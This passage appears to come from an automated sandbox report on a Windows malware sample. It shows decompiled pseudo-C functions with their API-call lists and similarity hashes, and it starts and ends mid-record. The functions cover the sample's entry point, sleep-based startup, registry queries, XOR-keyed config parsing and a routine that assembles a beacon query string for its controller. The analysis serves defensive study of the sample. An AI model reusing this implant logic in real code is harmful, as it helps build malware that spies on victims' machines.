                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 048111DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 56a978d85c985edc5f06294e268b4f21f8d1f077ec28103f0b537c923b29d7d0
                                • Instruction ID: 329577cf64d18fc19365d53c1b8c17a7acfc318c8ca8019260eac4122b1e8dc4
                                • Opcode Fuzzy Hash: 56a978d85c985edc5f06294e268b4f21f8d1f077ec28103f0b537c923b29d7d0
                                • Instruction Fuzzy Hash: 8D215C75900209FFEB01AF94CC48EAEBBBCEB08304F0045A6E601E6261D7759E44EB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E04816B0F(signed int __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				char _v32;
                                				long _v40;
                                				void* _t14;
                                				void* _t16;
                                				int _t18;
                                				signed int _t20;
                                				void* _t22;
                                				signed int _t23;
                                				intOrPtr _t25;
                                				unsigned int _t29;
                                				signed int _t33;
                                				signed int _t40;
                                
                                				_t33 = __edx;
                                				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x481a290 = _t14;
                                				if(_t14 != 0) {
                                					 *0x481a180 = GetTickCount();
                                					_t16 = E04814C1B(_a4);
                                					if(_t16 != 0) {
                                						L10:
                                						return _t16;
                                					} else {
                                						goto L3;
                                					}
                                					do {
                                						L3:
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t18 = SwitchToThread();
                                						_t29 = _v12.dwHighDateTime;
                                						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                						_push(0);
                                						_push(9);
                                						_push(_t29 >> 7);
                                						_push(_t20);
                                						L04817EEA();
                                						_t40 = _t18 + _t20;
                                						_t22 = E0481414A(_a4, _t40);
                                						_t23 = 2;
                                						Sleep(_t23 << _t40); // executed
                                					} while (_t22 == 1);
                                					_t25 =  *0x481a2ac; // 0x350
                                					_v32 = 0;
                                					if(_t25 != 0) {
                                						__imp__(_t25,  &_v32);
                                						if(_t25 == 0) {
                                							_v40 = 0;
                                						}
                                						if(_v40 != 0) {
                                							 *0x481a2b8 = 1; // executed
                                						}
                                					}
                                					_t16 = E048153F2(_t33); // executed
                                					goto L10;
                                				}
                                				_t16 = 8;
                                				goto L10;
                                			}

                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04816B24
                                • GetTickCount.KERNEL32 ref: 04816B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04816B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04816B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04816B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04816B97
                                • IsWow64Process.KERNEL32(00000350,?,?,00000001), ref: 04816BB5
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: a86c21b0ac3895ecf9d8cd40c6f71f65a9877d65f6a1484b9997869124e1b0ca
                                • Instruction ID: c83b391d839b0ee8f456e4b93f57c5d2c0a5bf2dc0621f243488dba01e9deb35
                                • Opcode Fuzzy Hash: a86c21b0ac3895ecf9d8cd40c6f71f65a9877d65f6a1484b9997869124e1b0ca
                                • Instruction Fuzzy Hash: 9A21C3B2A04214AFD710AF68D898E6A779CF744364F004E2BF549D6160E779AC04CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E048171A5(void* __ecx, void* __eflags) {
                                				char _v8;
                                				void* _v12;
                                				int _v16;
                                				int _v20;
                                				intOrPtr _t15;
                                				intOrPtr _t19;
                                				long _t24;
                                				long _t29;
                                				short* _t31;
                                				short* _t34;
                                
                                				_t15 =  *0x481a2d4; // 0x20bd5a8
                                				_v8 = _v8 & 0x00000000;
                                				_t3 = _t15 + 0x481ba30; // 0x4f0053
                                				_v16 = 4;
                                				_t31 = E04813875(__ecx, _t3);
                                				if(_t31 != 0) {
                                					_t19 =  *0x481a2d4; // 0x20bd5a8
                                					_t5 = _t19 + 0x481ba8c; // 0x6e0049
                                					_t34 = E04813875(__ecx, _t5);
                                					if(_t34 != 0) {
                                						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                						if(_t24 == 0) {
                                							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                							if(_t29 != 0) {
                                								_v8 = _v8 & 0x00000000;
                                							}
                                							RegCloseKey(_v12);
                                						}
                                						E048150CA(_t34);
                                					}
                                					E048150CA(_t31);
                                				}
                                				return _v8;
                                			}














                                APIs
                                  • Part of subcall function 04813875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,048171C8,004F0053,00000000,?), ref: 0481387E
                                  • Part of subcall function 04813875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,048171C8,004F0053,00000000,?), ref: 048138A8
                                  • Part of subcall function 04813875: memset.NTDLL ref: 048138BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 048171F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 04817213
                                • RegCloseKey.ADVAPI32(00000000), ref: 04817224
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                • Opcode ID: dd2fac8d4aa3b4cbcdac86e46989c20ab3e447149bc3a8445cf635c3aa744943
                                • Instruction ID: 867c856fbd2583e565b3acb654c8443f64874064c148ad5d2b87b15792d0f1f8
                                • Opcode Fuzzy Hash: dd2fac8d4aa3b4cbcdac86e46989c20ab3e447149bc3a8445cf635c3aa744943
                                • Instruction Fuzzy Hash: BF115E72600209FBEB11EBD8DC84FAE77BCEB44304F10095BB605E7061EBB4EA459B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				signed int _t11;
                                				void* _t13;
                                
                                				_t13 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x481a294) == 0) {
                                						E04815076();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x481a294) == 1) {
                                						_t10 = E04816B0F(_t11, _a4); // executed
                                						if(_t10 != 0) {
                                							_t13 = 0;
                                						}
                                					}
                                				}
                                				return _t13;
                                			}








                                APIs
                                • InterlockedIncrement.KERNEL32(0481A294), ref: 0481569A
                                  • Part of subcall function 04816B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04816B24
                                • InterlockedDecrement.KERNEL32(0481A294), ref: 048156BA
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 2b93cb02866bb178367db2d3ff08b566ee4e651698b8cad57105c8bd16c8acdc
                                • Instruction ID: 2724f3841bc0408c851053ad27392903b8be7ccc4fc18498451edf1a351f71b0
                                • Opcode Fuzzy Hash: 2b93cb02866bb178367db2d3ff08b566ee4e651698b8cad57105c8bd16c8acdc
                                • Instruction Fuzzy Hash: 94E04F35304332B797266EA89C24B9E675CAB80BC4F008F17E481E1038E754F840C6E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E04811AB8(void* __edx) {
                                				char _v8;
                                				char _v12;
                                				void* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E04814C8C(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x481a2d4; // 0x20bd5a8
                                				_t4 = _t24 + 0x481bd60; // 0x68d9308
                                				_t5 = _t24 + 0x481bd08; // 0x4f0053
                                				_t45 = E04815384( &_v16, _v8, _t5, _t4);
                                				if(_t45 == 0) {
                                					 *0x481a124(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x481a2d4; // 0x20bd5a8
                                						_t11 = _t32 + 0x481bd54; // 0x68d92fc
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x481bd08; // 0x4f0053
                                						_t52 = E04815D37(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x481a2d4; // 0x20bd5a8
                                							_t13 = _t35 + 0x481bd9e; // 0x30314549
                                							if(E048174B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                								_t61 =  *0x481a2b4 - 6;
                                								if( *0x481a2b4 <= 6) {
                                									_t42 =  *0x481a2d4; // 0x20bd5a8
                                									_t15 = _t42 + 0x481bbaa; // 0x52384549
                                									E048174B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x481a2d4; // 0x20bd5a8
                                							_t17 = _t38 + 0x481bd98; // 0x68d9340
                                							_t18 = _t38 + 0x481bd70; // 0x680043
                                							_t45 = E04811F7A(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x481a290, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x481a290, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E04813C84(_t54);
                                				}
                                				return _t45;
                                			}


















                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068D9340,?,00000000,30314549,00000014,004F0053,068D92FC), ref: 04811BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,048120B0), ref: 04811BB6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 17b396631311074812c194efe3087eee7b91f3390dde9877d06cac116063f9aa
                                • Instruction ID: 1de5731be523f4dcf2d67c687615f2fb477e6af109afed6b7e189663e25676fd
                                • Opcode Fuzzy Hash: 17b396631311074812c194efe3087eee7b91f3390dde9877d06cac116063f9aa
                                • Instruction Fuzzy Hash: DA318F71B00109BFDB15DBA4DD88E9A7BBCEB48704F140A67E604E7071E6B5BE04DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 94%
                                			E04812206(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t26;
                                				signed int _t31;
                                				signed int _t37;
                                				char* _t43;
                                				char* _t44;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				void* _t48;
                                				void* _t49;
                                				intOrPtr _t50;
                                				signed int _t56;
                                				void* _t58;
                                				void* _t59;
                                				signed int _t61;
                                				signed int _t65;
                                				signed int _t69;
                                				signed int _t73;
                                				signed int _t77;
                                				signed int _t81;
                                				void* _t86;
                                				intOrPtr _t102;
                                
                                				_t87 = __ecx;
                                				_t26 =  *0x481a2d0; // 0x63699bc3
                                				if(E04811BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
                                					 *0x481a324 = _v8;
                                				}
                                				_t31 =  *0x481a2d0; // 0x63699bc3
                                				if(E04811BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                					_v12 = 2;
                                					L50:
                                					return _v12;
                                				}
                                				_t37 =  *0x481a2d0; // 0x63699bc3
                                				if(E04811BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                					L48:
                                					HeapFree( *0x481a290, 0, _v16);
                                					goto L50;
                                				} else {
                                					_t86 = _v12;
                                					if(_t86 == 0) {
                                						_t43 = 0;
                                					} else {
                                						_t81 =  *0x481a2d0; // 0x63699bc3
                                						_t43 = E048138CE(_t87, _t86, _t81 ^ 0x724e87bc);
                                					}
                                					if(_t43 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                							 *0x481a298 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t44 = 0;
                                					} else {
                                						_t77 =  *0x481a2d0; // 0x63699bc3
                                						_t44 = E048138CE(_t87, _t86, _t77 ^ 0x2b40cc40);
                                					}
                                					if(_t44 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                							 *0x481a29c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t73 =  *0x481a2d0; // 0x63699bc3
                                						_t45 = E048138CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
                                					}
                                					if(_t45 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x481a2a0 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t69 =  *0x481a2d0; // 0x63699bc3
                                						_t46 = E048138CE(_t87, _t86, _t69 ^ 0x0602e249);
                                					}
                                					if(_t46 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x481a004 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t65 =  *0x481a2d0; // 0x63699bc3
                                						_t47 = E048138CE(_t87, _t86, _t65 ^ 0x3603764c);
                                					}
                                					if(_t47 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x481a02c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t61 =  *0x481a2d0; // 0x63699bc3
                                						_t48 = E048138CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
                                					}
                                					if(_t48 != 0) {
                                						_push(_t48);
                                						_t58 = 0x10;
                                						_t59 = E04813E49(_t58);
                                						if(_t59 != 0) {
                                							_push(_t59);
                                							E048150DF();
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t56 =  *0x481a2d0; // 0x63699bc3
                                						_t49 = E048138CE(_t87, _t86, _t56 ^ 0xb30fc035);
                                					}
                                					if(_t49 != 0 && E04813E49(0, _t49) != 0) {
                                						_t102 =  *0x481a37c; // 0x68d9630
                                						E048110DD(_t102 + 4, _t54);
                                					}
                                					_t50 =  *0x481a2d4; // 0x20bd5a8
                                					_t20 = _t50 + 0x481b252; // 0x68d87fa
                                					_t21 = _t50 + 0x481b7b5; // 0x6976612e
                                					 *0x481a320 = _t20;
                                					 *0x481a390 = _t21;
                                					HeapFree( *0x481a290, 0, _t86);
                                					_v12 = 0;
                                					goto L48;
                                				}
                                			}






























                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 048122AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 048122DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 0481230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812341
                                • StrToIntExA.SHLWAPI(00000000,00000000,048155D3,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812373
                                • HeapFree.KERNEL32(00000000,?,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 0481240F
                                • HeapFree.KERNEL32(00000000,?,?,048155D3,63699BC3,?,?,63699BC3,048155D3,?,63699BC3,E8FA7DD7,0481A00C,74ECC740), ref: 04812422
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 13ccce4b1c2f508a0b0d3acd4022c9dcb0bbad9ea65a1a9cba9eedf7bb6bf7d4
                                • Instruction ID: 002dfbefcac1913812c784ff12c21534b9989a8c2b8d3442a6f4e447343510de
                                • Opcode Fuzzy Hash: 13ccce4b1c2f508a0b0d3acd4022c9dcb0bbad9ea65a1a9cba9eedf7bb6bf7d4
                                • Instruction Fuzzy Hash: F46171B1B00104ABD715EBBDD888C9F77ADEB48744B240E97A506F3170EA79FD409B21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 70%
                                			E04816EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				void* _v24;
                                				intOrPtr _v40;
                                				void* __ecx;
                                				void* __edi;
                                				intOrPtr _t31;
                                				intOrPtr _t32;
                                				intOrPtr _t33;
                                				intOrPtr _t34;
                                				intOrPtr _t35;
                                				void* _t38;
                                				intOrPtr _t39;
                                				int _t42;
                                				void* _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t48;
                                				intOrPtr _t52;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				intOrPtr _t78;
                                				intOrPtr _t81;
                                				intOrPtr _t84;
                                				int _t87;
                                				intOrPtr _t88;
                                				int _t91;
                                				intOrPtr _t92;
                                				int _t95;
                                				void* _t98;
                                				void* _t99;
                                				void* _t103;
                                				intOrPtr _t105;
                                				long _t107;
                                				intOrPtr _t108;
                                				intOrPtr* _t109;
                                				long _t110;
                                				int _t111;
                                				void* _t112;
                                				void* _t113;
                                				void* _t114;
                                				void* _t115;
                                				void* _t117;
                                				void* _t118;
                                				void* _t120;
                                				void* _t121;
                                
                                				_t103 = __edx;
                                				_t110 = __eax;
                                				_v8 = 8;
                                				_t117 = RtlAllocateHeap( *0x481a290, 0, 0x800);
                                				if(_t117 != 0) {
                                					if(_t110 == 0) {
                                						_t110 = GetTickCount();
                                					}
                                					_t31 =  *0x481a018; // 0x4934a3dd
                                					asm("bswap eax");
                                					_t32 =  *0x481a014; // 0x5cb11ae7
                                					asm("bswap eax");
                                					_t33 =  *0x481a010; // 0x15dc9586
                                					asm("bswap eax");
                                					_t34 =  *0x481a00c; // 0x69ab8210
                                					asm("bswap eax");
                                					_t35 =  *0x481a2d4; // 0x20bd5a8
                                					_t2 = _t35 + 0x481b613; // 0x74666f73
                                					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x481a02c,  *0x481a004, _t110);
                                					_t38 = E04816A09();
                                					_t39 =  *0x481a2d4; // 0x20bd5a8
                                					_t3 = _t39 + 0x481b653; // 0x74707526
                                					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                					_t120 = _t118 + 0x38;
                                					_t112 = _t111 + _t42;
                                					if(_a12 != 0) {
                                						_t92 =  *0x481a2d4; // 0x20bd5a8
                                						_t7 = _t92 + 0x481b65e; // 0x732526
                                						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                						_t120 = _t120 + 0xc;
                                						_t112 = _t112 + _t95;
                                					}
                                					_t43 = E04815040(_t99);
                                					_t44 =  *0x481a2d4; // 0x20bd5a8
                                					_t9 = _t44 + 0x481b302; // 0x6d697426
                                					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                					_t48 =  *0x481a2d4; // 0x20bd5a8
                                					_t11 = _t48 + 0x481b2d7; // 0x74636126
                                					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                					_t52 =  *0x481a32c; // 0x68d95b0
                                					_t121 = _t120 + 0x1c;
                                					if(_t52 != 0) {
                                						_t88 =  *0x481a2d4; // 0x20bd5a8
                                						_t13 = _t88 + 0x481b676; // 0x73797326
                                						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t91;
                                					}
                                					_t105 =  *0x481a37c; // 0x68d9630
                                					_a28 = E04812885(0x481a00a, _t105 + 4);
                                					_t55 =  *0x481a31c; // 0x68d95e0
                                					_t107 = 0;
                                					if(_t55 != 0) {
                                						_t84 =  *0x481a2d4; // 0x20bd5a8
                                						_t16 = _t84 + 0x481b8da; // 0x3d736f26
                                						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t87;
                                					}
                                					_t56 =  *0x481a318; // 0x0
                                					if(_t56 != _t107) {
                                						_t81 =  *0x481a2d4; // 0x20bd5a8
                                						_t18 = _t81 + 0x481b8b1; // 0x3d706926
                                						wsprintfA(_t114 + _t117, _t18, _t56);
                                					}
                                					if(_a28 != _t107) {
                                						_t98 = RtlAllocateHeap( *0x481a290, _t107, 0x800);
                                						if(_t98 != _t107) {
                                							E04812DD0(GetTickCount());
                                							_t62 =  *0x481a37c; // 0x68d9630
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x481a37c; // 0x68d9630
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x481a37c; // 0x68d9630
                                							_t115 = E0481624D(1, _t103, _t117,  *_t68);
                                							asm("lock xadd [eax], ecx");
                                							if(_t115 != _t107) {
                                								StrTrimA(_t115, 0x48192ac);
                                								_push(_t115);
                                								_t108 = E048121C1();
                                								_v4 = _t108;
                                								if(_t108 != 0) {
                                									 *_t115 = 0;
                                									__imp__(_t98, _a8);
                                									_t109 = __imp__;
                                									 *_t109(_t98, _t108);
                                									 *_t109(_t98, _t115);
                                									_t78 = E04811032(0xffffffffffffffff, _t98, _v12, _v8);
                                									_v40 = _t78;
                                									if(_t78 != 0 && _t78 != 0x10d2) {
                                										E04811492();
                                									}
                                									HeapFree( *0x481a290, 0, _v24);
                                								}
                                								HeapFree( *0x481a290, 0, _t115);
                                								_t107 = 0;
                                							}
                                							HeapFree( *0x481a290, _t107, _t98);
                                						}
                                						HeapFree( *0x481a290, _t107, _a20);
                                					}
                                					HeapFree( *0x481a290, _t107, _t117);
                                				}
                                				return _v16;
                                			}


                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04816F1A
                                • GetTickCount.KERNEL32 ref: 04816F2E
                                • wsprintfA.USER32 ref: 04816F7D
                                • wsprintfA.USER32 ref: 04816F9A
                                • wsprintfA.USER32 ref: 04816FBB
                                • wsprintfA.USER32 ref: 04816FD9
                                • wsprintfA.USER32 ref: 04816FEE
                                • wsprintfA.USER32 ref: 0481700F
                                • wsprintfA.USER32 ref: 04817049
                                • wsprintfA.USER32 ref: 04817069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04817084
                                • GetTickCount.KERNEL32 ref: 04817094
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048170A8
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 048170C6
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 0481624D: strcpy.NTDLL ref: 04816297
                                  • Part of subcall function 0481624D: lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
                                  • Part of subcall function 0481624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                • StrTrimA.SHLWAPI(00000000,048192AC,00000000,068D9630), ref: 048170F4
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 048121C1: lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                  • Part of subcall function 048121C1: lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04817112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04817120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04817124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04817154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04817163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,068D9630), ref: 04817173
                                • HeapFree.KERNEL32(00000000,?), ref: 04817184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04817192
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: 20ebb6ac996a8bb8d42aa17b5909e3222b3767bc1ead4f5e29eec6eea0e4b6d7
                                • Instruction ID: 0d734c75e4753acef4fb0c2d1c87d78754814759dd4a15f603c4e4dee3a6c3a6
                                • Opcode Fuzzy Hash: 20ebb6ac996a8bb8d42aa17b5909e3222b3767bc1ead4f5e29eec6eea0e4b6d7
                                • Instruction Fuzzy Hash: 46718EB2601205AFD325EBA8EC88E5677ECEB88710B050D17F949D3231E67EEC05DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 77%
                                			E048146D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* __ebx;
                                				void* __edi;
                                				long _t63;
                                				intOrPtr _t64;
                                				intOrPtr _t65;
                                				intOrPtr _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				void* _t71;
                                				intOrPtr _t72;
                                				int _t75;
                                				void* _t76;
                                				intOrPtr _t77;
                                				intOrPtr _t81;
